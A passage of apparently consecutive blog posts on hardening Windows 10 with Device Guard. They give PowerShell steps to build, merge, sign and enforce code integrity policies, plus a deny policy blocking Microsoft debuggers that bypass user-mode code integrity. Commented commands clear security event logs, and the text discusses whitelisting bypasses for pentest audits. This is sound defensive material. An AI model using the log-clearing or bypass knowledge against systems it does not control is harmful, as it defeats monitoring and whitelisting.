I want to simulate denying execution of everything on the system that attempts to load. After I perform normal computing tasks on my computer for a while, I will then develop a new code integrity policy based upon the certificates used to sign everything that would have been denied in the Microsoft-Windows-CodeIntegrity/Operational and Microsoft-Windows-AppLocker (it is not documented that Device Guard pulls from the AppLocker log) logs.


  3 - Advanced Boot Options Menu (during policy configuration/testing phases)

If I somehow misconfigure my policy, deploy it, and my Surface no longer boots, I’ll need a fallback option to recover. This option would allow you to reboot and hold down F8 to access a recovery prompt where I could delete the deployed code integrity policy if I had to. Note: you might be thinking that this would be an obvious Device Guard bypass for someone with physical access. Well, if your policy is not in audit mode and it is required to be signed, you can delete the deployed code integrity policy from disk but it will return unharmed after a reboot. Configuring Bitlocker would prevent an attacker with physical access from viewing and deleting files from disk though via the recovery prompt.

  4 - UMCI

We want Device Guard to not only apply to drivers but to user-mode binaries, MSIs, and scripts as well.

  5 - WHQL


Only load driver that are Windows Hardware Quality Labs (WHQL) signed. This is supposed to be a mandate for all new Windows 10-compatible drivers so we’ll want to make sure we enforce this.

  6 - EV Signers

We want to only load drivers that are not only WHQL signed but also signed with an extended validation certificate. This is supposed to be a requirement for all drivers in Windows 10 Anniversary update. Unfortunately, as we will later discover, this is not the case; not even for all Microsoft drivers (specifically, my Surface Pro 4-specific hardware drivers).

Several others policy rules will be described in subsequent steps. For details on all the available, configurable policy rule options, read the official documentation.

What will follow will be the code and rationale I used to develop my personal code integrity policy. This is a good time to mention that there is never going to be a one size fits all solution for code integrity policy development. I am choosing a relatively locked down, semi-unrealistic policy that will most likely form a minimal basis for pretty much any other code integrity policy out there.


Configuration Phase #1 - Deny-all audit policy deployment

In this configuration phase, I’m going to create an empty, template policy placed in audit mode that will simulate denying execution of every driver, user-mode binary, MSI, and script. After running my system for a few days and getting a good baseline for the programs I’m going to execute (excluding third party binaries since I only want MS binaries to run), I can generate a new policy based on what would have been denied execution in the event log.


There is no standard method of generating an empty policy so what I did was call New-CIPolicy and have it generate a policy from a completely empty directory.


It is worth noting at this point that I will be deploying all subsequent policies directly to %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b. You can, however configure via Group Policy an alternate file path where CI policies should be pulled from and I believe you have to set this location via Group Policy if you’re using a signed policy file (at least from my experimentation). This procedure is documented here. You had damn well better make sure that any user doesn’t have write access to the directory where the policy file is contained if an alternate path is specified with Group Policy.


What follows is the code I used to generate and deploy the initial deny-all audit policy. I created a C:\DGPolicyFiles directory to contain all my policy related files. You can use any directory you want though.


# The staging directory I'm using for my Device Guard setup

$PolicyDirectory = 'C:\DGPolicyFiles'


# Path to the empty template policy that will place Device Guard

# into audit mode and simulate denying execution of everything.

$EmptyPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyPolicy.xml'


# Generate an empty, deny-all policy

# There is no intuitive way to generate an empty policy so we will

# go about doing it by generating a policy based on an empty directory.

$EmptyDir = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyDir'

mkdir -Path $EmptyDir

New-CIPolicy -FilePath $EmptyPolicyXml -Level PcaCertificate -ScanPath $EmptyDir -NoShadowCopy

Remove-Item $EmptyDir


# Only load drivers that are WHQL signed

Set-RuleOption -FilePath $EmptyPolicyXml -Option 2
# Enable UMCI enforcement
Set-RuleOption -FilePath $EmptyPolicyXml -Option 0

# Only allow drivers to load that are WHQL signed by trusted MS partners

# who sign their drivers with an extended validation certificate.

# Note: this is an idealistic setting that will probably prevent some of your

# drivers from loading. Enforcing this in audit mode however will at least

# inform you as to what the problematic drivers are.

Set-RuleOption -FilePath $EmptyPolicyXml -Option 8


# A generated policy will also have the following policy options set by default

# * Unsigned System Integrity Policy

# * Audit Mode

# * Advanced Boot Options Menu

# * Enforce Store Applications


# In order to deploy the policy, the XML policy has to be converted

# to p7b format with the ConvertFrom-CIPolicy cmdlet.

$EmptyPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $EmptyPolicyXml -BinaryFilePath $EmptyPolicyBin


# We're going to copy the policy file in binary format to here. By simply copying

# the policy file to this destination, we're deploying our policy and enabling it

# upon reboot.

$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $EmptyPolicyBin -Destination $CIPolicyDeployPath -Force


# At this point, you may want to clear the Microsoft-Windows-CodeIntegrity/Operational

# event log and increase the size of the log to accommodate the large amount of

# entries that will populate the event log as a result of an event log entry being

# created upon code being loaded.


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the deny-all audit policy will be in place.


Configuration Phase #2 - Code integrity policy creation based on audit logs

Hopefully, you’ve run your system for a while and established a good baseline of all the drivers, user-mode binaries (including DLLs) and scripts that are necessary for you to do your job. If that’s the case, then you are ready to build generate the next code integrity policy based solely on what was reported as denied in the event log.


When generating this new code integrity policy, I will specify the PcaCertificate file rule level which is probably the best file rule level for this round of CI policy generation as it is the highest in the code signing cert signer chain and it has a longer validity time frame than a leaf certificate (i.e. lowest in the signing chain). You could use more restrictive file rules (e.g. LeafCertificate, Hash, FilePublisher, etc.) but you would be weighing updatability with increased security. For example, you should be careful when whitelisting third party PCA certificates as a malicious actor would just need to be issued a code signing certificate from that third party vendor as a means of bypassing your policy. Also, consider a scenario where a vulnerable older version of a signed Microsoft binary was used to gain code execution. If this is a concern, consider using a file rule like FilePublisher or WHQLFilePublisher for WHQL-signed drivers.


Now, when we call New-CIPolicy to generate the policy based on the audit log, you may notice a lot of warning messages claiming that it is unable to locate a bunch of drivers on disk. This apperas to be an unfortunate path parsing bug that will become a problem that we will address in the next configuration phase.



Driver path parsing bug

# Hopefully, you've spent a few days using your system for its intended purpose and didn't

# install any software that would compromise the "gold image" that you're aiming for.

# Now we're going to craft a CI policy based on what would have been denied from loading.

# Obviously, these are the kinds of applications, scripts, and drivers that will need to

# execute in order for your system to work as intended.


# The staging directory I'm using for my Device Guard setup

$PolicyDirectory = 'C:\DGPolicyFiles'


# Path to the CI policy that will be generated based on the entries present

# in the CodeIntegrity event log.

$AuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.xml'


# Generate the CI policy based on what would have been denied in the event logs

# (i.e. Microsoft-Windows-CodeIntegrity/Operational and Microsoft-Windows-AppLocker/MSI and Script)

# PcaCertificate is probably the best file rule level for this round of CI policy generation

# as it is the highest in the code signing cert signer chain and it has a longer validity time frame

# than a leaf certificate (i.e. lowest in the signing chain).

# This may take a few minutes to generate the policy.

# The resulting policy will result in a rather concise list of whitelisted PCA certificate signers.

New-CIPolicy -FilePath $AuditPolicyXml -Level PcaCertificate -Audit -UserPEs


# Note: This policy, when deployed will still remain in audit mode as we should not be confident

# at this point that we've gotten everything right.


# Now let's deploy the new policy

$AuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $AuditPolicyXml -BinaryFilePath $AuditPolicyBin


# We're going to copy the policy file in binary format to here. By simply copying

# the policy file to this destination, we're deploying our policy and enabling it

# upon reboot.

$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $AuditPolicyBin -Destination $CIPolicyDeployPath -Force


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the audit policy will be in place.


Configuration Phase #3 - Code integrity policy final tweaks while still in audit mode

In this phase, we’ve rebooted and noticed that there are a bunch of drivers that wouldn’t have loaded if we actually enforced the policy. This is due to the driver path parsing issue I described in the last section. Until this bug is fixed, I believe there are two realistic methods of handling this:

  •  Manually copy the paths of the drivers from the event log with a PowerShell script and copy the drivers to a dedicated directory and generate a new policy based on the drivers in that directory and then merge that policy with the policy we generated in phase #2. I personally had some serious issues with this strategy in practice.
  • Generate a policy by scanning %SystemRoot%\System32\drivers and then merge that policy with the policy we generated in phase #2. For this blog post, that’s what we will be doing out of simplicity. The only reason I hesitate to use this strategy is that I don’t want to be overly permissive necessarily and whitelist certificates for drivers I don’t use that might be issued by a non-Microsoft public certification authority.

Additionally, one of the side effects of this bug is that the generated policy from phase #2 only has rules for user-mode code and not drivers. We obviously need driver rules.


# My goal in this phase is to see what remaining CodeItegrity log entries

# exist and to try to rectify them while still in audit mode before placing

# code integrity into enforcement mode.


# For me, I had about 30 event log entries that indicated the following:

#

# Code Integrity determined that a process (Winload) attempted to load

# System32\Drivers\mup.sys that did not meet the Authenticode signing

# level requirements or violated code integrity policy. However, due to

# code integrity auditing policy, the image was allowed to load.


# Upon trying to create a new policy based on these event log entries via the following command

# New-CIPolicy -FilePath Audit2.xml -Level PcaCertificate -Audit

# I got a bunch of the following warnings:

#

# File at path \\?\GLOBALROOTSystem32\Drivers\Wof.sys in the audit log was not found.

# It has likely been deleted since it was last run

#

# Ugh. No it wasn't deleted. This looks like a path parsing bug. Personally, I'm

# comfortable trusting all drivers in %SystemRoot%\System32\Drivers so I'm going

# to create a policy from that directory and merge it with my prior. Afterall,

# my system would not boot if I didn't whitelist them.


$PolicyDirectory = 'C:\DGPolicyFiles'


# Path to the CI policy that will be generated based on the entries present

# in the CodeIntegrity event log.

$DriverPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'SystemDriversPolicy.xml'


# Create a whitelisted policy for all drivers in System32\drivers to account for

# the New-CIPolicy audit log scanning path parsing bug...


# Note: this really annoying bug prevented and rules in the previous phase from being created

# for drivers - only user-mode binaries and scripts. If I were to deploy and enforce a policy without

# driver whitelist rules, I'd have an unbootable system.

New-CIPolicy -FilePath $DriverPolicyXml -Level PcaCertificate -ScanPath 'C:\Windows\System32\drivers\'


# Some may consider this strategy to be too permissive (myself partially included). The ideal strategy

# here probably would have been to pull out the individual driver paths, copy them to a dedicated

# directory and generate a policy for just those drivers. For the ultra paranoid, this is left as an

# exercise to the reader.


# Now we have to merge this policy with the last one as a means of consolidating whitelist rules.

$AuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.xml'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'

Merge-CIPolicy -OutputFilePath $MergedAuditPolicyXml -PolicyPaths $DriverPolicyXml, $AuditPolicyXml


# Now let's deploy the new policy

$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


# We're going to copy the policy file in binary format to here. By simply copying

# the policy file to this destination, we're deploying our policy and enabling it

# upon reboot.

$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the merged policy will be in place.


Configuration Phase #4 - Deployment of the CI policy in enforcement mode

Alright, we’ve rebooted and the CodeIntegrity log no longer presents the entries for drivers that would not have been loaded. Now we’re going to simply remove audit mode from the policy, redeploy, reboot, and cross our fingers that we have a working system upon reboot.


# This is the point where I feel comfortable enforcing my policy. The CodeIntegrity log

# is now only populated with a few anomalies - e.g. primarily entries related to NGEN

# native image generation. I'm okay with blocking these but hopefully, the Device Guard

# team can address how to handle NGEN generated images properly since this is not documented.


$PolicyDirectory = 'C:\DGPolicyFiles'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'


# Now all we need to do is remove audit mode from the policy, redeploy, reboot, and cross our

# fingers that the system is useable. Note that the "Advanced Boot Options Menu" option is still

# enabled so we have a way to delete the deployed policy from a recovery console if things break.


Set-RuleOption -FilePath $MergedAuditPolicyXml -Delete -Option 3


$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the enforced policy will be in place. This is the moment of truth!


Configuration Phase #5 - Updating policy to no longer enforce EV signers

So it turns out that I was a little overambitious in forcing EV signer enforcement on my Surface tablet as pretty much all of my Surface hardware drivers didn't load. This is kind of a shame considering I would expect MS hardware drivers to be held to the highest standards imposed by MS. So I'm going to remove EV signer enforcement and while I'm at it, I'm going to enforce blocking of flight-signed drivers. These are drivers signed by an MS test certificate used in Windows Insider Preview builds. So obviously, you won't want to be running WIP builds of Windows if you're enforcing this.


FYI, I was fortunate enough for the system to boot to discover that EV signature enforcement was the issue.


$PolicyDirectory = 'C:\DGPolicyFiles'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'


# No longer enforce EV signers

Set-RuleOption -FilePath $MergedAuditPolicyXml -Delete -Option 8


# Enforce blocking of flight signed code.

Set-RuleOption -FilePath $MergedAuditPolicyXml -Option 4


$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the modified, enforced policy will be in place.


# In retrospect, it would have been smart to have enabled "Boot Audit on Failure"

# with Set-RuleOption as it would have placed device guard into audit mode in order to allow

# boot drivers to boot that would have otherwise been blocked by policy.


Configuration Phase #6 - Monitoring and continued hardening

At this point we have a decent starting point and I'll leave it up to you as to how you'd like to proceed in terms of CI policy configuration and deployment.


Me personally, I performed the following:


  1. Used Add-SignerRule to add an Update and User signer rule with my personal code signing certificate. This grants me permission to sign my policy and execute user-mode binaries and scripts signed by me. I need to sign some of my PowerShell code that I use often since it is incompatible in constrained language mode. Signed scripts authorized by CI policy execute in full language mode. Obviously, I personally need to sign my own code sparingly. For example, it would be dumb for me to sign Invoke-Shellcode since that would explicitly circumvent user-mode code integrity.
  2. Remove "Unsigned System Integrity Policy" from the configuration. This forces me to sign the policy. It also prevents modification and removal of a deployed policy and it can only be updated by signing an updated policy.
  3. I removed the "Boot Menu Protection" option from the CI policy. This is a potential vulnerability to an attacker with physical access.
  4. I also enabled virtualization-based security via group policy to achieve the hardware supported Device Guard enforcement/improvements.

What follows is the code I used to allow my code signing cert to sign the policy and sign user-mode binaries. Obviously, this is specific to my personal code-signing certificate.

# I don't plan on using my code signing cert to sign drivers so I won't allow that right now.

# Note: I'm performing these steps on an isolated system that contains my imported code signing

# certificate. I don't have my code signing cert on the system that I'm protecting with

# Device Guard hopefully for obvious reasons.


$PolicyDirectory = 'C:\DGPolicyFiles'

$CodeSigningSertPath = Join-Path $PolicyDirectory 'codesigning.cer'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'


Add-SignerRule -FilePath $MergedAuditPolicyXml -CertificatePath $CodeSigningSertPath -User -Update


$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


# I'm signing my code integrity policy now.

signtool.exe sign -v /n "Matthew Graeber" -p7 . -p7co 1.3.6.1.4.1.311.79.1 -fd sha256 $MergedAuditPolicyBin


# Now, once I deploy this policy, I will only be able to make updates to the policy by

# signing an updated policy with the same signing certificate.


Virtualization-based Security Enforcement

My Surface Pro 4 has the hardware to support these features so I would be silly not to employ them. This is easy enough to do in Group Policy. After configuring these settings, reboot and validate that all Device Guard features are actually set. The easiest way to do this in my opinion is to use the System Information application.


Enabling Virtualization Based Security Features

Confirmation of Device Guard enforcement

Conclusion

If you’ve made it this far, congratulations! Considering there’s no push-button solution to configuring Device Guard according to your requirements, it can take a lot of experimentation and practice. That said, I don’t think there should ever be a push-button solution to the development of a strong whitelisting policy catered to your specific environment. It takes a lot of work just like how competently defending your enterprise should take a lot of work versus just throwing money at "turnkey solutions".


Examples of blocked applications and scripts

Now at this point, you may be asking the following questions (I know I did):


  • How much of a pain will it be to update the policy to permit new applications? Well, this would in essence require a reference machine in which you can place it into audit mode during a test period of the new software installation. You would then need to generate a new policy based on the audit logs and hope that all loaded binaries are signed. If not, you’d have to fall back to file hash rules which would force you to update the policy again as soon as a new update comes out. This process is complicated by installer applications whereas configuring portable binaries should be much easier since the footprint is much smaller.
  • What if there’s a signed Microsoft binary that permits unsigned code execution? Oh these certainly exist and I will cover these in future blog posts along with realistic code integrity policy deny rule mitigations.
  • What if a certificate I whitelist is revoked? I honestly don’t think Device Guard currently covers this scenario.
  • What are the ways in which an admin (local or remote) might be able to modify or disable Device Guard? I will attempt to enumerate some of these possibilities in future blog posts.
  • What is the fate of AppLocker? That will need to be left to Microsoft to answer that question.
  • I personally have many more questions but this blog post may not be the appropriate forum to air all possible grievances. I have been in direct contact with the Device Guard team at Microsoft and they have been very receptive to my feedback.

Finally, despite the existence of bypasses, in many cases code integrity policies can be supplemented to mitigate many known bypasses. In the end though, Device Guard will significantly raise the cost to an attacker and block most forms of malware that don't specifically take Device Guard bypasses into consideration. I commend Microsoft for putting some serious thought and engineering into Device Guard and I sincerely hope that they will continue to improve it, document it more thoroughly, and evangelize it. Now, I may be being overly optimistic, but I would hope that they would consider any vulnerabilities to the Device Guard implementation and possibly even unsigned code execution from signed Microsoft binaries to be a security boundary. But hey, a kid can dream, right?


I hope you enjoyed this post! Look forward to more Device Guard posts (primarily with an offensive twist) coming up!

Using Device Guard to Mitigate Against Device Guard Bypasses

8 September 2016 at 16:38
In my last post, I presented an introduction to Device Guard and described how to go about developing a fairly locked down code integrity policy - a policy that consisted entirely of implicit allow rules. In this post, I’m going to describe how to deny execution of code that would otherwise be whitelisted according to policy. Why would you want to do this? Well, as I blogged about previously, one of the easiest methods of circumventing user-mode code integrity (UMCI) is to take advantage of signed applications that can be used to execute arbitrary, unsigned code. In the blog post, I achieved this using one of Microsoft’s debuggers, cdb.exe. Unfortunately, cdb.exe isn’t the only signed Microsoft binary that can circumvent a locked down code integrity policy. In the coming months, Casey Smith (@subtee) and I will gradually unveil additional signed binaries that circumvent UMCI. In the spirit of transparency, Casey and I will release bypasses as we find them but we will only publicize bypasses for which we can produce an effective mitigation. Any other bypass would be reported to Microsoft through the process of coordinated disclosure.


While the existence of bypasses may cause some to question the effectiveness of Device Guard, consider that the technique I will describe will block all previous, current, and future versions of binaries that circumvent UMCI. The only requirement being that the binaries be signed with a code signing certificate that is in the same chain as the PCA certificate used when we created a deny rule - a realistic scenario. What I’m describing is the FilePublisher file rule level.


In the example that follows, I will create a new code integrity policy with explicit deny rules for all signed versions of the binaries I’m targeting up to the highest supported version number (65535.65535.65535.65535) – cdb.exe, windbg.exe, and kd.exe – three user-mode and kernel-mode debuggers signed by Microsoft. You can then merge the denial CI policy with that of your reference policy. I confirmed with the Device Guard team at Microsoft that what I’m about to describe is most likely the ideal method (at time of writing) of blocking the execution of individual binaries that bypass your code integrity policy.


# The directory that contains the binaries that circumvent our Device Guard policy

$Scanpath = 'C:\Program Files\Windows Kits\10\Debuggers\x64'


# The binaries that circumvent our Device Guard policy

$DeviceGuardBypassApps = 'cdb.exe', 'windbg.exe', 'kd.exe'


$DenialPolicyFilePath = 'BypassMitigationPolicy.xml'


# Get file and signature information for every file in the scan directory

$Files = Get-SystemDriver -ScanPath $Scanpath -UserPEs -NoShadowCopy


# We'll use this to filter out the binaries we want to block

$TargetFilePaths = $DeviceGuardBypassApps | ForEach-Object { Join-Path $Scanpath $_ }


# Filter out the user-mode binaries we want to block

# This would just as easily apply to drivers. Just change UserMode to $False

# If you’re wanting this to apply to drivers though, you might consider using

# the WHQLFilePublisher rule.

$FilesToBlock = $Files | Where-Object {

    $TargetFilePaths -contains $_.FriendlyName -and $_.UserMode -eq $True

}


# Generate a dedicated device guard bypass policy that contains explicit deny rules for the binaries we want to block.

New-CIPolicy -FilePath $DenialPolicyFilePath -DriverFiles $FilesToBlock -Level FilePublisher -Deny -UserPEs



# Set the MinimumFileVersion to 65535.65535.65535 - an arbitrarily high number.

# Setting this value to an arbitraily high version number will ensure that any signed bypass binary prior to version 65535.65535.65535.65535
# will be blocked. This logic allows us to theoretically block all previous, current, and future versions of binaries assuming

# they were signed with a certificate signed by the specified PCA certificate

$DenyPolicyRules = Get-CIPolicy -FilePath $DenialPolicyFilePath

$DenyPolicyRules | Where-Object { $_.TypeId -eq 'FileAttrib' } | ForEach-Object {

    # For some reason, the docs for Edit-CIPolicyRule say not to use it...

    Edit-CIPolicyRule -FilePath $DenialPolicyFilePath -Id $_.Id -Version '65535.65535.65535.65535'


}



# The remaining portion is optional. They are here to demonstrate

# policy merging with a reference policy and deployment.



<#

$ReferencePolicyFilePath = 'FinalPolicy.xml'

$MergedPolicyFilePath = 'Merged.xml'

$DeployedPolicyPath = 'C:\DGPolicyFiles\SIPolicy.bin'

#>


# Extract just the file rules from the denial policy. We do this because I don't want to merge

# and possibly overwrite any policy rules from the reference policy.

<#

$Rules = Get-CIPolicy -FilePath $DenialPolicyFilePath

Merge-CIPolicy -OutputFilePath $MergedPolicyFilePath -PolicyPaths $ReferencePolicyFilePath -Rules $Rules

#>


# Deploy the new policy and reboot.

<#

ConvertFrom-CIPolicy -XmlFilePath $MergedPolicyFilePath -BinaryFilePath $DeployedPolicyPath

#>


So in the code above, to generate the policy, we specified the location where the offending binaries were installed. In reality, they can be in any directory and you can generate this deny policy on any machine. In other words, you’re not required to generate it on the machine that will have the code integrity policy deployed. That directory is then scanned. You need to filter out the specific binaries that you want to deny and merge the deny policy with a reference policy and redeploy. Once you’ve redeployed the policy, you will want to validate its efficacy. To validate it, I would ensure the following:

  1. Both the x86 and x64 version of the binary are blocked.
  2. At least two versions of each binary (for each architecture) are blocked.

So, for example, to validate that the signed cdb.exe can no longer execute, be sure to obtain two versions of cdb.exe and have a 32-bit and 64-bit build of each version.


It is unfortunately kind of a hack to have to manually modify the policy XML to specify an arbitrarily large version number. Ideally, in a future version of Device Guard, Microsoft would allow you to specify a wildcard that would imply that the deny rule would apply to all versions of the binary. In the meantime, this hack seems to get the job done. What’s great about this simple workflow is that as new bypasses come out, you can just keep adding deny rules to an all-encompassing Device Guard bypass code integrity policy! In fact, I plan on maintaining such a bypass-specific CI policy on GitHub in the near future.


Now, I’ve done a decent amount of testing of this mitigation, which I consider to be effective and not difficult to implement. I encourage everyone out there to poke holes in my theory, though. And if you discover a bypass for my mitigation, please be a good citizen and let the world know! I hope these posts are continuing to pique your interest in this important technology!


For reference, here is the policy that was generated based on the code above. Note that while there are explicit file paths in the generated policy, the deny rules apply regardless of where the binaries are located on disk.



<?xml version="1.0" encoding="utf-8"?>

<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">

  <VersionEx>10.0.0.0</VersionEx>

  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>

  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>

  <Rules>

    <Rule>

      <Option>Enabled:Unsigned System Integrity Policy</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Audit Mode</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Advanced Boot Options Menu</Option>

    </Rule>

    <Rule>

      <Option>Required:Enforce Store Applications</Option>

    </Rule>

    <Rule>

      <Option>Enabled:UMCI</Option>

    </Rule>

  </Rules>

  <!--EKUS-->

  <EKUs />

  <!--File Rules-->

  <FileRules>

    <FileAttrib ID="ID_FILEATTRIB_F_1" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\cdb.exe FileAttribute" FileName="CDB.Exe" MinimumFileVersion="65535.65535.65535.65535" />

    <FileAttrib ID="ID_FILEATTRIB_F_2" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\kd.exe FileAttribute" FileName="kd.exe" MinimumFileVersion="65535.65535.65535.65535" />

    <FileAttrib ID="ID_FILEATTRIB_F_3" FriendlyName="C:\Program Files\Windows Kits\10\Debuggers\x64\windbg.exe FileAttribute" FileName="windbg.exe" MinimumFileVersion="65535.65535.65535.65535" />

  </FileRules>

  <!--Signers-->

  <Signers>

    <Signer ID="ID_SIGNER_F_1" Name="Microsoft Code Signing PCA">

      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3" />

    </Signer>

    <Signer ID="ID_SIGNER_F_2" Name="Microsoft Code Signing PCA 2010">

      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />

      <CertPublisher Value="Microsoft Corporation" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_2" />

      <FileAttribRef RuleID="ID_FILEATTRIB_F_3" />

    </Signer>

  </Signers>

  <!--Driver Signing Scenarios-->

  <SigningScenarios>

    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Auto generated policy on 09-07-2016">

      <ProductSigners />

    </SigningScenario>

    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="Auto generated policy on 09-07-2016">

      <ProductSigners>

        <DeniedSigners>

          <DeniedSigner SignerId="ID_SIGNER_F_1" />

          <DeniedSigner SignerId="ID_SIGNER_F_2" />

        </DeniedSigners>

      </ProductSigners>

    </SigningScenario>

  </SigningScenarios>

  <UpdatePolicySigners />

  <CiSigners>

    <CiSigner SignerId="ID_SIGNER_F_1" />

    <CiSigner SignerId="ID_SIGNER_F_2" />

  </CiSigners>

  <HvciOptions>0</HvciOptions>

</SiPolicy>

Windows Device Guard Code Integrity Policy Reference

27 October 2016 at 15:50
One of the more obvious ways to circumvent Device Guard deployments is by exploiting code integrity policy misconfigurations. The ability to effectively audit deployed policies requires a thorough comprehension of the XML schema used by Device Guard. This post is intended to serve as documentation of the XML elements of a Device Guard code integrity policy with a focus on auditing from the perspective of a pentester. And do note that the schema used by Microsoft is not publicly documented and subject to change in future versions. If things change, expect an update from me.
As a reminder, deployed code integrity policies are stored in %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b in binary form. If you're lucky enough to track down the original XML code integrity policy, you can validate that it matches the deployed SIPolicy.p7b by converting it to binary form with ConvertFrom-CIPolicy and then comparing the hashes with Get-FileHash. If you are unable to locate the original XML policy, you can recover an XML policy with the ConvertTo-CIPolicy function I wrote. Note, however that ConvertTo-CIPolicy cannot recover all element ID and FriendlyName attributes as the process of converting to binary form is a lossy process, unfortunately.
For reference, here are some code integrity policies that I personally use. Obviously, yours will be different in your environment.
Policies are generated initially using the New-CiPolicy cmdlet.
The current (but subject to change) code integrity schema can be found here. This was pulled out from an embedded resource in the ConfigCI cmdlets - Microsoft.ConfigCI.Commands.dll.
What will follow is a detailed breakdown of most code integrity policy XML elements that you may encounter while auditing Device Guard deployments. Hopefully, at some point in the future, Microsoft will provide such documentation. In the mean time, I hope this is helpful! In a future post, I will conduct an actual code integrity policy audit and identify potential vulnerabilities that would allow for unsigned code execution.

VersionEx
Default value: 10.0.0.0
Purpose: An admin can set this to perform versioning of updated CI policies. This is what I do in BypassDenyPolicy.xml. VersionEx can be set programmatically with Set-CIPolicyVersion.

PolicyTypeID

Default value: {A244370E-44C9-4C06-B551-F6016E563076}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

PlatformID
Default value: {2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

Rules

The Rules element consist of multiple child Rule elements. A Rule element refers to a specific policy rule option - i.e. a specific configuration of Device Guard. Some, but not all of these options are documented. Policy rule options are configured with the Set-RuleOption cmdlet.

Documented and/or publicly exposed policy rules

1) Enabled:UMCI
Description: Enforces user-mode code integrity for user mode binaries, PowerShell scripts, WSH scripts, and MSIs. The absence of this policy rule implies that whitelist/blacklist rules will only apply to drivers.
Operational impact: User mode binaries and MSIs not explicitly whitelisted will not execute. PowerShell will be placed into ConstrainedLanguage mode. Whitelisted, signed scripts have no restrictions and run in FullLanguage mode. WSH scripts (VBScript and JScript) not whitelisted per policy are unable to instantiate COM/ActiveX objects. Signed scripts whitelisted by policy have no such restrictions.
2) Required:WHQL
